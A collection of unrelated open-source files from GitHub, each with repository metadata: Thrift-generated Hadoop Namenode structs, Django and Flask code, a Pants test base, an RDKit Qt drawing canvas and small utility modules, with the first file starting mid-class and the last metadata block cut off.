thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRING, 'storage', None, None, ), # 2
(3, TType.I32, 'thriftPort', None, None, ), # 3
)
def __init__(self, name=None, storage=None, thriftPort=None,):
self.name = name
self.storage = storage
self.thriftPort = thriftPort
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.storage = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.thriftPort = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('datanodeDown_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.storage is not None:
oprot.writeFieldBegin('storage', TType.STRING, 2)
oprot.writeString(self.storage)
oprot.writeFieldEnd()
if self.thriftPort is not None:
oprot.writeFieldBegin('thriftPort', TType.I32, 3)
oprot.writeI32(self.thriftPort)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class datanodeDown_result(object):
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('datanodeDown_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getDelegationToken_args(object):
"""
Attributes:
- ctx
- renewer
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'renewer', None, None, ), # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, renewer=None,):
self.ctx = ctx
self.renewer = renewer
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.renewer = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getDelegationToken_args')
if self.renewer is not None:
oprot.writeFieldBegin('renewer', TType.STRING, 1)
oprot.writeString(self.renewer)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getDelegationToken_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (hadoop.api.common.ttypes.ThriftDelegationToken, hadoop.api.common.ttypes.ThriftDelegationToken.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = hadoop.api.common.ttypes.ThriftDelegationToken()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getDelegationToken_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
|
{
"content_hash": "a55c2860d01c40f05890245b054f2736",
"timestamp": "",
"source": "github",
"line_count": 5052,
"max_line_length": 188,
"avg_line_length": 30.759303246239114,
"alnum_prop": 0.6337357460938505,
"repo_name": "hortonworks/hortonworks-sandbox",
"id": "a0857587d263dfef53eafdc2ef0e7d17868bd31e",
"size": "155513",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "desktop/libs/hadoop/gen-py/hadoop/api/hdfs/Namenode.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "27264"
},
{
"name": "Assembly",
"bytes": "207947"
},
{
"name": "C",
"bytes": "10279874"
},
{
"name": "C++",
"bytes": "208068"
},
{
"name": "CSS",
"bytes": "356769"
},
{
"name": "Emacs Lisp",
"bytes": "3171"
},
{
"name": "Java",
"bytes": "3064179"
},
{
"name": "JavaScript",
"bytes": "1532806"
},
{
"name": "PHP",
"bytes": "4160"
},
{
"name": "Perl",
"bytes": "139518"
},
{
"name": "Python",
"bytes": "27735073"
},
{
"name": "R",
"bytes": "12290"
},
{
"name": "Ruby",
"bytes": "5050"
},
{
"name": "Shell",
"bytes": "42062"
},
{
"name": "XSLT",
"bytes": "585"
}
],
"symlink_target": ""
}
|
from tempfile import gettempdir, mkstemp
from json import dump, load
class ParseSyncConfig():
CONFIG_PATH = '%s/parsesync.config' % gettempdir()
def __init__(self):
try:
with open(self.CONFIG_PATH, 'r') as f:
self.config = load(f)
except Exception, e:
self.config = {'from_parse': {}}
def get_last_updated_item_from_parse(self, model):
key = self._get_key_from_model(model)
return self.config['from_parse'].get(key)
def set_last_updated_item_from_parse(self, model, date):
key = self._get_key_from_model(model)
self.config['from_parse'][key] = date
def _get_key_from_model(self, model):
return '%s.%s' % (model.__module__, model.__name__)
def save(self):
with open(self.CONFIG_PATH, 'w') as f:
dump(self.config, f)
|
{
"content_hash": "62bf6ba568c8139acccd436d2019473c",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 60,
"avg_line_length": 30.785714285714285,
"alnum_prop": 0.5835266821345708,
"repo_name": "cereigido/django-parse-sync",
"id": "754c518040567cc3bc4770eab490f81bfecad9ef",
"size": "886",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "parsesync/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "498"
},
{
"name": "Python",
"bytes": "20293"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crm', '0002_auto_20161126_0030'),
]
operations = [
migrations.AlterField(
model_name='employee',
name='company',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='empresa'),
),
migrations.AlterField(
model_name='person',
name='company',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='empresa'),
),
]
|
{
"content_hash": "3fa05873e0c7a2c22da15390c21dc100",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 97,
"avg_line_length": 27.17391304347826,
"alnum_prop": 0.5904,
"repo_name": "rg3915/orcamentos",
"id": "9f14ca6585186335a6ae1ef43eb3f085844b50bb",
"size": "697",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "orcamentos/crm/migrations/0003_auto_20161126_0032.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "50664"
},
{
"name": "HTML",
"bytes": "542962"
},
{
"name": "JavaScript",
"bytes": "133637"
},
{
"name": "Jupyter Notebook",
"bytes": "134102"
},
{
"name": "Makefile",
"bytes": "1730"
},
{
"name": "Python",
"bytes": "197204"
},
{
"name": "Shell",
"bytes": "10278"
}
],
"symlink_target": ""
}
|
import os
from flask import Flask, url_for, render_template, request
app = Flask(__name__)
@app.route('/')
def renderMain():
return render_template('home.html')
@app.route('/page1')
def renderPage1():
return render_template('page1.html')
@app.route('/page2')
def renderPage2():
return render_template('page2.html')
@app.route('/page3')
def renderPage3():
return render_template('page3.html')
@app.route('/page4')
def renderPage4():
return render_template('page4.html')
@app.route('/ftoc')
def renderResult():
try:
print "request.args['fTemp']",request.args['fTemp']
ftemp = float(request.args['fTemp'])
ctemp = ftoc(ftemp)
return render_template('celsiusResult.html', fTemp=ftemp, cTemp=ctemp)
except ValueError:
return "Sorry: something went wrong."
def ftoc(ftemp):
return (ftemp-32.0)*(5.0/9.0)
if __name__=="__main__":
app.run(debug=False,host="0.0.0.0",port=54321)
|
{
"content_hash": "b958905b51954da5ca1edcd9b79b676c",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 78,
"avg_line_length": 22.857142857142858,
"alnum_prop": 0.6479166666666667,
"repo_name": "pconrad/flask-practice-web-app",
"id": "d15d3ce8c2cef8b091cf29c7556867f4eba6dec0",
"size": "960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hello.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "426"
},
{
"name": "HTML",
"bytes": "2888"
},
{
"name": "Python",
"bytes": "960"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sex', models.CharField(choices=[('men', 'mężczyzna'), ('women', 'kobieta')], max_length=20)),
('weight', models.FloatField()),
('height', models.FloatField()),
],
),
]
|
{
"content_hash": "7b38be4e775894ce00ae70629e5f5290",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 114,
"avg_line_length": 27.304347826086957,
"alnum_prop": 0.5493630573248408,
"repo_name": "PyLadiesPoznanAdvanced/django-introduction-bmi",
"id": "e3d114a090e8043390800bad37c0fdde4c12f39c",
"size": "702",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "calculators/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "369"
},
{
"name": "HTML",
"bytes": "3007"
},
{
"name": "Python",
"bytes": "11222"
}
],
"symlink_target": ""
}
|
from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
import unittest2 as unittest
from pants.goal.task_registrar import TaskRegistrar
from pants.goal.goal import Goal
class EngineTestBase(unittest.TestCase):
@classmethod
def as_goal(cls, goal_name):
"""Returns a ``Goal`` object of the given name"""
return Goal.by_name(goal_name)
@classmethod
def as_goals(cls, *goal_names):
"""Converts the given goal names to a list of ``Goal`` objects."""
return map(cls.as_goal, goal_names)
@classmethod
def install_task(cls, name, action=None, dependencies=None, goal=None):
"""Creates and installs a task with the given name.
:param string name: The task name.
:param action: The task's action.
:param list dependencies: The list of goal names the task depends on, if any.
:param string goal: The name of the goal to install the task in, if different from the task
name.
:returns The installed ``TaskRegistrar`` object.
"""
TaskRegistrar(name, action=action or (lambda: None),
dependencies=dependencies or []).install(goal if goal is not None else None)
def setUp(self):
super(EngineTestBase, self).setUp()
# TODO(John Sirois): Now that the BuildFileParser controls goal registration by iterating
# over plugin callbacks a GoalRegistry can be constructed by it and handed to all these
# callbacks in place of having a global Goal registry. Remove the Goal static cling.
Goal.clear()
def tearDown(self):
Goal.clear()
super(EngineTestBase, self).tearDown()
|
{
"content_hash": "d943e6a36116f1485fd127dc4e3045a8",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 95,
"avg_line_length": 35.97872340425532,
"alnum_prop": 0.6924896510940272,
"repo_name": "square/pants",
"id": "c53101ef6a0c5d2b0559e21861796ad6de7330dd",
"size": "1838",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/python/pants_test/engine/base_engine_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AGS Script",
"bytes": "273"
},
{
"name": "CSS",
"bytes": "9347"
},
{
"name": "GAP",
"bytes": "4684"
},
{
"name": "Java",
"bytes": "46389"
},
{
"name": "JavaScript",
"bytes": "9523"
},
{
"name": "Python",
"bytes": "2250380"
},
{
"name": "Scala",
"bytes": "5517"
},
{
"name": "Shell",
"bytes": "29381"
},
{
"name": "Thrift",
"bytes": "1674"
}
],
"symlink_target": ""
}
|
"""piddleQt
This module implements the PIDDLE/Sping API for a Qt canvas
Bits have been shamelessly cobbled from piddleSVG.py
Greg Landrum (Landrum@RationalDiscovery.com) 29 Octover, 2002
"""
"""
Functionality implemented:
x drawLine
x drawPolygon
x drawString
x drawImage
Known problems:
"""
from rdkit.sping import pid
from qt import *
from qtcanvas import *
from math import *
import copy
def _ColorToQt(color):
""" convenience function for converting a sping.pid color to a Qt color
"""
if color == pid.transparent:
return None
else:
return QColor(int(color.red * 255), int(color.green * 255), int(color.blue * 255))
class QCanvasRotText(QCanvasText):
""" used to draw (UGLY) rotated text
"""
def __init__(self, txt, canvas, angle=0):
QCanvasText.__init__(self, txt, canvas)
self._angle = angle
def draw(self, qP):
qP.save()
x = self.x()
y = self.y()
theta = -self._angle
qP.rotate(theta)
qP.translate(-x, -y)
thetaR = theta * pi / 180.
newX = cos(-thetaR) * x - sin(-thetaR) * y
newY = sin(-thetaR) * x + cos(-thetaR) * y
qP.translate(newX, newY)
QCanvasText.draw(self, qP)
qP.restore()
class QtCanvas(pid.Canvas):
def __init__(self, destCanvas, size=(300, 300), name='QtCanvas'):
self.size = size
pid.Canvas.__init__(self, size, name)
self._canvas = destCanvas
self._brush = QBrush()
self._pen = QPen()
#self._font = QFont()
self._font = QApplication.font()
self.objs = []
self._initOutput()
self.nObjs = 0
def _initOutput(self):
for obj in self.objs:
if type(obj) == tuple:
obj[0].hide()
else:
obj.hide()
self.objs = []
self.nObjs = 0
def _adjustFont(self, font):
if font.face:
self._font.setFamily(font.face)
self._font.setBold(font.bold)
self._font.setItalic(font.italic)
self._font.setPointSize(font.size)
self._font.setUnderline(font.underline)
# public functions
def clear(self):
self._initOutput()
def flush(self):
self._canvas.update()
def save(self, file=None, format=None):
self._canvas.update()
#------------- drawing methods --------------
def drawLine(self, x1, y1, x2, y2, color=None, width=None, dash=None, **kwargs):
"Draw a straight line between x1,y1 and x2,y2."
# set color...
if color:
if color == pid.transparent:
return
elif self.defaultLineColor == pid.transparent:
return
else:
color = self.defaultLineColor
qColor = _ColorToQt(color)
if width:
w = width
else:
w = self.defaultLineWidth
self._pen.setColor(qColor)
self._pen.setWidth(int(w))
if dash is not None:
self._pen.setStyle(Qt.DashLine)
else:
self._pen.setStyle(Qt.SolidLine)
l = QCanvasLine(self._canvas)
l.setPen(self._pen)
l.setPoints(x1, y1, x2, y2)
l.setVisible(1)
l.setZ(self.nObjs)
if dash is not None:
self._pen.setStyle(Qt.SolidLine)
self.nObjs += 1
self.objs.append(l)
def drawPolygon(self, pointlist, edgeColor=None, edgeWidth=None, fillColor=pid.transparent,
closed=0, dash=None, **kwargs):
"""drawPolygon(pointlist) -- draws a polygon
pointlist: a list of (x,y) tuples defining vertices
"""
pts = []
for point in pointlist:
pts += list(point)
ptArr = QPointArray()
ptArr.setPoints(pts)
# set color for fill...
filling = 0
if fillColor:
if fillColor != pid.transparent:
filling = 1
qColor = _ColorToQt(fillColor)
self._brush.setColor(qColor)
if filling:
self._brush.setStyle(Qt.SolidPattern)
else:
self._brush.setStyle(Qt.NoBrush)
# set color for edge...
if not edgeColor:
edgeColor = self.defaultLineColor
qColor = _ColorToQt(edgeColor)
if qColor:
self._pen.setColor(qColor)
# set edge width...
if edgeWidth is None:
edgeWidth = self.defaultLineWidth
self._pen.setWidth(edgeWidth)
self._pen.setJoinStyle(Qt.RoundJoin)
if dash is not None:
self._pen.setStyle(Qt.DashLine)
else:
self._pen.setStyle(Qt.SolidLine)
poly = QCanvasPolygon(self._canvas)
poly.setPen(self._pen)
poly.setBrush(self._brush)
poly.setPoints(ptArr)
poly.setVisible(1)
poly.setZ(self.nObjs)
self.nObjs += 1
self.objs.append(poly)
# qt is moronic and doesn't draw the outlines of polygons
if edgeColor != pid.transparent:
for i in range(len(pointlist) - 1):
l = QCanvasLine(self._canvas)
l.setPoints(pointlist[i][0], pointlist[i][1], pointlist[i + 1][0], pointlist[i + 1][1])
l.setPen(self._pen)
l.setVisible(1)
l.setZ(self.nObjs)
self.objs.append(l)
if closed:
l = QCanvasLine(self._canvas)
l.setPoints(pointlist[0][0], pointlist[0][1], pointlist[-1][0], pointlist[-1][1])
l.setPen(self._pen)
l.setVisible(1)
l.setZ(self.nObjs)
self.objs.append(l)
if dash is not None:
self._pen.setStyle(Qt.SolidLine)
self.nObjs += 1
def drawString(self, s, x, y, font=None, color=None, angle=0, **kwargs):
# set color...
if color:
if color == pid.transparent:
return
elif self.defaultLineColor == pid.transparent:
return
else:
color = self.defaultLineColor
if font is None:
font = self.defaultFont
qColor = _ColorToQt(color)
if font is not None:
self._adjustFont(font)
if angle != 0:
txt = QCanvasRotText(s, self._canvas, angle=angle)
else:
txt = QCanvasText(s, self._canvas)
txt.setTextFlags(Qt.AlignLeft | Qt.AlignVCenter)
if self._font:
txt.setFont(self._font)
txt.setColor(qColor)
txt.setVisible(1)
txt.setX(x)
y -= font.size
txt.setY(y)
txt.setZ(self.nObjs)
self.nObjs += 1
self.objs.append(txt)
def drawImage(self, image, x1, y1, x2=None, y2=None, **kwargs):
"""
"""
from io import StringIO
sio = StringIO()
image.save(sio, format='png')
base = QPixmap()
base.loadFromData(sio.getvalue())
pm = QCanvasPixmap(base, QPoint(0, 0))
pma = QCanvasPixmapArray()
pma.setImage(0, pm)
img = QCanvasSprite(pma, self._canvas)
img.setVisible(1)
img.setX(x1)
img.setY(y1)
self.objs.append((img, base, pm, pma))
def stringWidth(self, s, font=None):
"Return the logical width of the string if it were drawn \
in the current font (defaults to self.font)."
if not font:
font = self.defaultFont
if font:
self._adjustFont(font)
t = QCanvasText(s, self._canvas)
t.setFont(self._font)
rect = t.boundingRect()
return rect.width()
def fontAscent(self, font=None):
if not font:
font = self.defaultFont
if font:
self._adjustFont(font)
t = QCanvasText('B', self._canvas)
t.setFont(self._font)
rect = t.boundingRect()
# FIX: this is a hack, but I can't immediately figure out how to solve the
# problem that the bounding rectangle includes the descent:
return 1.0 * rect.height()
def fontDescent(self, font=None):
if not font:
font = self.defaultFont
if font:
self._adjustFont(font)
t = QCanvasText('B', self._canvas)
t.setFont(self._font)
rect1 = t.boundingRect()
t = QCanvasText('y', self._canvas)
t.setFont(self._font)
rect2 = t.boundingRect()
return 1. * (rect2.height() - rect1.height())
def test(canvas):
#... for testing...
canvas.defaultLineColor = Color(0.7, 0.7, 1.0) # light blue
canvas.drawLines(map(lambda i: (i * 10, 0, i * 10, 300), range(30)))
canvas.drawLines(map(lambda i: (0, i * 10, 300, i * 10), range(30)))
canvas.defaultLineColor = black
canvas.drawLine(10, 200, 20, 190, color=red)
canvas.drawEllipse(130, 30, 200, 100, fillColor=yellow, edgeWidth=4)
canvas.drawArc(130, 30, 200, 100, 45, 50, fillColor=blue, edgeColor=navy, edgeWidth=4)
canvas.defaultLineWidth = 4
canvas.drawRoundRect(30, 30, 100, 100, fillColor=blue, edgeColor=maroon)
canvas.drawCurve(20, 20, 100, 50, 50, 100, 160, 160)
#canvas.drawString("This is a test!", 30,130, Font(face="times",size=16,bold=1),
# color=green, angle=-45)
#canvas.drawString("This is a test!", 30,130, color=red, angle=-45)
polypoints = [(160, 120), (130, 190), (210, 145), (110, 145), (190, 190)]
canvas.drawPolygon(polypoints, fillColor=lime, edgeColor=red, edgeWidth=3, closed=1)
canvas.drawRect(200, 200, 260, 260, edgeColor=yellow, edgeWidth=5)
canvas.drawLine(200, 260, 260, 260, color=green, width=5)
canvas.drawLine(260, 200, 260, 260, color=red, width=5)
canvas.flush()
def dashtest(canvas):
#... for testing...
canvas.defaultLineColor = Color(0.7, 0.7, 1.0) # light blue
canvas.drawLines(map(lambda i: (i * 10, 0, i * 10, 300), range(30)), dash=(3, 3))
canvas.drawLines(map(lambda i: (0, i * 10, 300, i * 10), range(30)), dash=(3, 3))
canvas.defaultLineColor = black
canvas.drawLine(10, 200, 20, 190, color=red, dash=(3, 3))
canvas.drawEllipse(130, 30, 200, 100, fillColor=yellow, edgeWidth=4, dash=(3, 3))
canvas.drawArc(130, 30, 200, 100, 45, 50, fillColor=blue, edgeColor=navy, edgeWidth=4, dash=(3,
3))
canvas.defaultLineWidth = 4
canvas.drawRoundRect(30, 30, 100, 100, fillColor=blue, edgeColor=maroon, dash=(3, 3))
canvas.drawCurve(20, 20, 100, 50, 50, 100, 160, 160, dash=(3, 3))
canvas.drawString("This is a test!", 30, 130, Font(face="times", size=16, bold=1), color=green,
angle=-45)
canvas.drawString("This is a test!", 30, 130, color=red, angle=-45)
polypoints = [(160, 120), (130, 190), (210, 145), (110, 145), (190, 190)]
canvas.drawPolygon(polypoints, fillColor=lime, edgeColor=red, edgeWidth=3, closed=1, dash=(3, 3))
canvas.drawRect(200, 200, 260, 260, edgeColor=yellow, edgeWidth=5, dash=(3, 3))
canvas.drawLine(200, 260, 260, 260, color=green, width=5, dash=(3, 3))
canvas.drawLine(260, 200, 260, 260, color=red, width=5, dash=(3, 3))
canvas.flush()
if __name__ == '__main__':
import sys
from rdkit.sping.pid import *
app = QApplication(sys.argv)
w = QCanvasView()
qCanv = QCanvas(300, 300)
w.setCanvas(qCanv)
canv = QtCanvas(qCanv)
dashtest(canv)
w.show()
w.adjustSize()
app.setMainWidget(w)
app.exec_loop()
|
{
"content_hash": "1d73501af30dd1b1b0240948817ef182",
"timestamp": "",
"source": "github",
"line_count": 383,
"max_line_length": 99,
"avg_line_length": 27.407310704960835,
"alnum_prop": 0.6217014385062398,
"repo_name": "bp-kelley/rdkit",
"id": "c781bd82d0e119d2934839dadae747d31716a3d6",
"size": "11286",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "rdkit/sping/Qt/pidQt.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1593408"
},
{
"name": "C#",
"bytes": "10167"
},
{
"name": "C++",
"bytes": "13831236"
},
{
"name": "CMake",
"bytes": "761688"
},
{
"name": "Dockerfile",
"bytes": "2590"
},
{
"name": "Fortran",
"bytes": "7590"
},
{
"name": "HTML",
"bytes": "43059702"
},
{
"name": "Java",
"bytes": "369342"
},
{
"name": "JavaScript",
"bytes": "52043"
},
{
"name": "Jupyter Notebook",
"bytes": "498341"
},
{
"name": "LLVM",
"bytes": "40048"
},
{
"name": "Lex",
"bytes": "4508"
},
{
"name": "Makefile",
"bytes": "10862"
},
{
"name": "Python",
"bytes": "4156873"
},
{
"name": "QMake",
"bytes": "389"
},
{
"name": "SMT",
"bytes": "3010"
},
{
"name": "SWIG",
"bytes": "342569"
},
{
"name": "Shell",
"bytes": "3822"
},
{
"name": "Smarty",
"bytes": "5864"
},
{
"name": "Yacc",
"bytes": "61432"
}
],
"symlink_target": ""
}
|
from iris_sdk.models.maps.base_map import BaseMap
class AvailableNpaNxxListMap(BaseMap):
available_npa_nxx = None
|
{
"content_hash": "82b9d1acdf2cb4b80b38a7ed1a4d103a",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 49,
"avg_line_length": 23.8,
"alnum_prop": 0.7899159663865546,
"repo_name": "scottbarstow/iris-python",
"id": "9e11eb16e434945c0b1e6b763e12351d421ac0a5",
"size": "142",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "iris_sdk/models/maps/available_npa_nxx_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "308732"
}
],
"symlink_target": ""
}
|
"""Generate parms pages."""
import os
import mkdocs_gen_files
repo_base = os.path.abspath(
os.path.join(
os.path.abspath(__file__), os.path.pardir, os.path.pardir, os.path.pardir
)
)
params_source = os.path.join(repo_base, "python", "federatedml", "param")
params_doc_target = os.path.join(repo_base, "doc", "federatedml_component", "params")
md_template = """\
# {name}
::: federatedml.param.{name}
options:
heading_level: 2
show_source: true
show_root_heading: true
show_root_toc_entry: false
show_root_full_path: false
"""
def create_params_doc():
os.makedirs(params_doc_target, exist_ok=True)
for file_name in os.listdir(params_source):
if file_name.endswith(".py") and file_name != "__init__.py":
name = file_name[:-3]
full_doc_path = os.path.join(params_doc_target, f"{name}.md")
with mkdocs_gen_files.open(full_doc_path, "w") as fd:
print(md_template.format(name=name), file=fd)
mkdocs_gen_files.set_edit_path(full_doc_path, os.path.join(params_source, file_name))
|
{
"content_hash": "eb8156283df2a72070d4a1c103e9233a",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 97,
"avg_line_length": 34.53125,
"alnum_prop": 0.6271493212669683,
"repo_name": "FederatedAI/FATE",
"id": "355a255c6bdf288252086aa9407dcccbc098c2dd",
"size": "1105",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doc/mkdocs/gen_params_doc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "19716"
},
{
"name": "Python",
"bytes": "5121767"
},
{
"name": "Rust",
"bytes": "3971"
},
{
"name": "Shell",
"bytes": "19676"
}
],
"symlink_target": ""
}
|
from .logindialog import login
from .exitdialog import exit
from .msgdialog import MessageDialog
from .msgdialog import msg
from .ipaddressdialog import ipaddressinput
from .urlinputdialog import urlinput
from .numinputdialog import numinput
from .confirmdialog import confirm
from .confirmdialog import ConfirmDialog
from .basedialog import DynamicTextWidget
# from .weblogindialog import weblogin
from .settingsdialog import settingsinput
__version__ = '0.1.0'
__all__ = ['DynamicTextWidget', 'ConfirmDialog', 'MessageDialog', 'login', 'exit', 'msg', 'ipaddressinput', 'urlinput', 'numinput', 'confirm']
__author__ = 'dragondjf(dragondjf@gmail.com)'
|
{
"content_hash": "512d5269856438f1e67b6d640220bfbb",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 142,
"avg_line_length": 36.388888888888886,
"alnum_prop": 0.7877862595419848,
"repo_name": "dragondjf/CloudSetuper",
"id": "38628ea5a171ebaa31ca7ca9daa15f84eea9c583",
"size": "698",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "setuper desktop app/gui/dialogs/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1806"
},
{
"name": "C++",
"bytes": "3059"
},
{
"name": "CSS",
"bytes": "171046"
},
{
"name": "JavaScript",
"bytes": "801718"
},
{
"name": "Lua",
"bytes": "72652"
},
{
"name": "Objective-C",
"bytes": "342"
},
{
"name": "Python",
"bytes": "8361927"
},
{
